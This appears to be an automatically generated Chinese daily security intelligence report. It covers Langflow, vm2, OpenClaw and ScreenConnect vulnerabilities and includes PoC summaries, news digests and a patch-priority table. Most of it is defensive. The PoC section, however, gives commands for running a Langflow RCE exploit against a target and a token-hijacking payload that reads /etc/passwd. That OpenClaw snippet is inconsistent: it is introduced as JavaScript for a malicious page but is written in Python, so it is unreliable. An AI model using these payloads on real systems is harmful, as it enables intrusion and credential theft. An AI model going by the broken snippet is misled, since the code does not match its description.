每日安全情报报告 · 2026-03-28
每日安全情报报告
日期:2026-03-28 | 编辑:自动化安全情报系统 | 版本:v1.0
一、高危漏洞速报
🔴 CVE-2026-33017 — Langflow 未授权远程代码执行
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-33017 |
| 漏洞类型 | 缺失身份验证 + 代码注入(Remote Code Execution) |
| 受影响组件 | Langflow ≤ 1.8.1 |
| CVSS 评分 | 9.3 / 10(Critical) |
| 利用状态 | ⚠️ 已在野利用,披露后 20 小时即被武器化 |
| 参考链接 | FreeBuf 分析 · CSDN 详解 |
漏洞原理:Langflow 的公共 Flow 构建端点(/api/v1/build/{flow_id}/flow)无需认证即可访问,攻击者可向该接口提交包含恶意代码的 Flow 数据,代码经 validate.py 中的 prepare_global_scope() 函数执行后,实现任意命令执行,进而窃取 API 密钥并完全控制服务器。
修复建议:
- 立即升级至 Langflow 1.8.2 或更高版本
- 若无法立即升级,通过网络防火墙封锁公开访问的 Flow 构建端点
- 审计已部署实例,检查是否存在可疑的 Flow 执行记录
🔴 CVE-2026-22709 — vm2 沙箱逃逸
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-22709 |
| 漏洞类型 | 沙箱逃逸(Sandbox Escape) |
| 受影响组件 | Node.js vm2 库(数百万应用受影响) |
| CVSS 评分 | 9.8 / 10(Critical) |
| 利用条件 | 无需权限、攻击复杂度低 |
| 参考链接 | FreeBuf 原文 · CSDN 分析 |
漏洞原理:攻击者可构造特殊 JavaScript 代码,绕过 vm2 的沙箱隔离机制,在宿主机上执行任意代码。该漏洞无需特权,攻击复杂度极低,对使用 vm2 的 Node.js 应用构成严重威胁。
修复建议:
- 检查项目是否依赖 vm2 库(npm list vm2)
- vm2 项目已停止维护,建议迁移至 isolated-vm 或 vm2-node
- 短期内,限制 vm2 可执行代码的输入来源,做好输入过滤
🟠 CVE-2026-25253 — OpenClaw AI 一键 RCE
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-25253 |
| 漏洞类型 | 令牌劫持 + 远程代码执行 |
| 受影响组件 | OpenClaw / Clawdbot / Moltbot AI 助手框架 |
| CVSS 评分 | 8.8 / 10(High) |
| 在野情况 | 超过 24,478 个公开暴露实例受影响 |
| 参考链接 | 深度分析 · CSDN POC 报告 |
漏洞原理:攻击者通过诱导用户点击恶意链接,劫持认证令牌后实现"一键 RCE"。该漏洞结合了 WebSocket 劫持与认证令牌窃取技术,攻击链较短,危害极大。
修复建议:
- 立即检查并更新至最新版本
- 审计公开暴露的 OpenClaw 实例,避免对公网直接开放
- 实施严格的 CORS 策略和 WebSocket 认证机制
🟠 ScreenConnect 设备密钥泄露漏洞(ConnectWise)
| 字段 | 详情 |
|---|---|
| 漏洞类型 | 设备密钥信息泄露 |
| 受影响组件 | ConnectWise ScreenConnect |
| 危险等级 | 高危 |
| 修复状态 | ✅ 官方已发布安全更新 |
| 参考链接 | 安全圈报道 |
漏洞原理:ScreenConnect 在设备密钥处理机制上存在安全缺陷,攻击者可能通过该漏洞泄露敏感设备密钥,进而在远程访问管理场景中实施攻击。
修复建议:
- 立即应用 ConnectWise 发布的最新安全补丁
- 检查现有设备连接是否存在异常访问行为
- 更换可能已泄露的设备密钥
二、漏洞 PoC 速递
PoC #1 — CVE-2026-33017 Langflow 未授权 RCE
来源:GitHub — MaxMnMl/langflow-CVE-2026-33017-poc
链接:https://github.com/MaxMnMl/langflow-CVE-2026-33017-poc
漏洞触发原理:
Langflow <= 1.8.1 暴露了无需认证的公共流构建接口,接受攻击者控制的 Flow 数据(包含任意代码),该代码通过 validate.py 的 prepare_global_scope() 函数执行。
利用步骤概述:
# 1. 克隆 POC 仓库
git clone https://github.com/MaxMnMl/langflow-CVE-2026-33017-poc.git
cd langflow-CVE-2026-33017-poc
# 2. 安装依赖
pip install -r requirements.txt
# 3. 执行 POC(指定目标地址)
python poc.py --target http://<target-ip>:7860 --cmd "id"
# 预期输出示例(命令执行成功):
# [+] Target: http://<target-ip>:7860
# [+] Sending malicious flow payload...
# [+] Response: {"result": "uid=1000(langflow) gid=1000(langflow)"}
防御检测要点:
- 监控 /api/v1/build/ 路径的非正常 POST 请求
- 检查系统日志中是否有非预期命令执行记录
PoC #2 — Apifox 供应链投毒(Electron RCE)
来源:白帽酱博客 — rce.moe
链接:https://rce.moe/2026/03/25/apifox-supply-chain-attack-analysis/
漏洞背景:
Apifox 桌面端基于 Electron 框架开发,因未严格启用 sandbox 参数且暴露了 Node.js API,攻击者可通过供应链投毒将恶意代码植入 Apifox 更新包,从而在用户机器上执行任意系统命令。
攻击链概述:
恶意更新包注入
↓
Electron 渲染进程加载恶意 JS
↓
利用 Node.js API(fs/child_process)执行系统命令
↓
持久化后门 + 数据窃取(API 密钥、请求体内容等)
复现关键条件:
1. Electron 应用未开启 sandbox: true(nodeIntegration: true 或暴露 preload bridge)
2. 更新分发渠道未做完整性校验(无签名验证)
3. 渲染进程可访问 require('child_process')
防御建议:
- 所有 Electron 应用强制开启 contextIsolation: true + sandbox: true
- 对软件更新包实施代码签名验证
- 开发者审计 Apifox 是否在受控环境(如 CI/CD)中运行
PoC #3 — CVE-2026-25253 OpenClaw 令牌劫持 RCE
来源:云盘 Plus 技术分析
链接:https://yunpan.plus/t/17908-1-1
利用步骤概述:
# 攻击载体:构造恶意 WebSocket 请求劫持用户令牌
# 1. 搭建恶意页面,嵌入如下 JS:
import websocket
import json
# 目标 OpenClaw 实例
TARGET = "ws://target-openclaw:8080/ws"
# 劫持令牌后伪造身份发送命令
payload = {
"type": "execute",
"token": "<stolen_token>",
"command": "cat /etc/passwd"
}
ws = websocket.create_connection(TARGET)
ws.send(json.dumps(payload))
result = ws.recv()
print("[RCE Result]", result)
防御要点:
- 在 WebSocket 握手阶段验证 Origin 头
- 实施基于时间戳的令牌有效期控制
- 避免将 OpenClaw 实例暴露在公网
三、网络安全最新资讯
📰 文章一:IBM X-Force 2026 威胁情报报告:AI 驱动攻击激增,基础漏洞问题更严峻
摘要:IBM 发布《2026年 X-Force 威胁情报指数报告》,报告指出网络犯罪分子正以前所未有的速度利用基础安全漏洞。勒索软件同比激增 49%,AI 工具使攻击者能更快速地识别和利用企业弱点。然而,大多数入侵事件仍依赖未修补漏洞、凭据盗窃和配置错误。报告强调,AI 安全虽重要,但企业应首先补好"基础课"。
链接:https://china.newsroom.ibm.com/2026-03-03-IBM-2026-X-Force-,AI
📰 文章二:Langflow 漏洞 CVE-2026-33017 在披露 20 小时内引发野外攻击
摘要:Langflow 平台存在的严重 RCE 漏洞(CVE-2026-33017)在安全研究人员公开披露后仅 20 小时,即有攻击者开始在野外利用。该漏洞结合了缺失身份验证和代码注入问题,攻击者无需登录即可执行任意代码、窃取 API 密钥,并控制运行 Langflow 的服务器。该事件再次证明漏洞武器化速度正在加速。
链接:https://www.msn.cn/zh-cn/news/other/关键Langflow漏洞CVE-2026-33017在披露20小时内引发攻击/ar-AA1ZbC9y
📰 文章三:Apifox 供应链投毒攻击完整技术分析
摘要:安全研究员「白帽酱」发布针对 Apifox 的供应链投毒攻击完整技术报告。Apifox 桌面端基于 Electron 框架,因未启用严格沙箱并暴露 Node.js API,攻击者可通过污染更新分发链路植入后门。一旦成功,攻击者可完全访问用户本地文件系统,并窃取所有 API 请求数据(含认证令牌)。该事件提醒开发者工具链同样是高价值攻击目标。
链接:https://rce.moe/2026/03/25/apifox-supply-chain-attack-analysis/
📰 文章四:2026年3月技术安全洞察:量子计算密码突破与硬件安全演进
摘要:西交利物浦大学完成 Kyber-256-k1 密码挑战,Google 警告量子计算"Q-Day"最早可能于 2029 年到来。与此同时,嵌入式处理器安全架构迎来范式转变,AMD 等厂商积极推进硬件级安全能力建设。随着量子计算威胁临近,后量子密码(PQC)标准化和企业迁移计划正变得日益紧迫。
链接:https://blog.csdn.net/qq_40652101/article/details/159539752
📰 文章五:国际刑警组织捣毁 4.5 万个恶意 IP,全球网络安全协同防御加速
摘要:2026年3月15日全球安全日报显示,国际刑警组织成功捣毁 4.5 万个恶意 IP 地址,同时披露 GlassWorm 供应链攻击事件以及针对东南亚军事组织的 APT 攻击行动。微软为此专门发布 Windows 11 热补丁,修复 RRAS(路由和远程访问服务)高危漏洞,彰显全球安全社区协同响应能力的持续提升。
链接:https://cloud.tencent.com/developer/article/2646122
四、安全建议总结
| 优先级 | 行动项 |
|---|---|
| 🔴 立即 | 升级 Langflow 至 ≥ 1.8.2,封锁 /api/v1/build/ 公网访问 |
| 🔴 立即 | 评估 Node.js 项目对 vm2 的依赖,规划迁移至 isolated-vm |
| 🟠 本周内 | 为 ScreenConnect 应用最新安全补丁,轮换设备密钥 |
| 🟠 本周内 | 审计 OpenClaw 等 AI Agent 框架部署情况,限制公网暴露 |
| 🟡 近期 | 审查 Electron 应用(如 Apifox)sandbox 配置,验证更新包签名 |
| 🟡 规划中 | 制定后量子密码迁移评估计划,关注 NIST PQC 标准进展 |
本报告由自动化安全情报系统生成,数据来源:FreeBuf、CSDN 安全频道、IBM X-Force、腾讯云开发者社区、安全圈等权威来源。
⚠️ 免责声明:PoC 内容仅用于安全研究与防御目的,请勿用于未经授权的攻击行为。
AtomGit 是由开放原子开源基金会联合 CSDN 等生态伙伴共同推出的新一代开源与人工智能协作平台。平台坚持“开放、中立、公益”的理念,把代码托管、模型共享、数据集托管、智能体开发体验和算力服务整合在一起,为开发者提供从开发、训练到部署的一站式体验。
更多推荐



所有评论(0)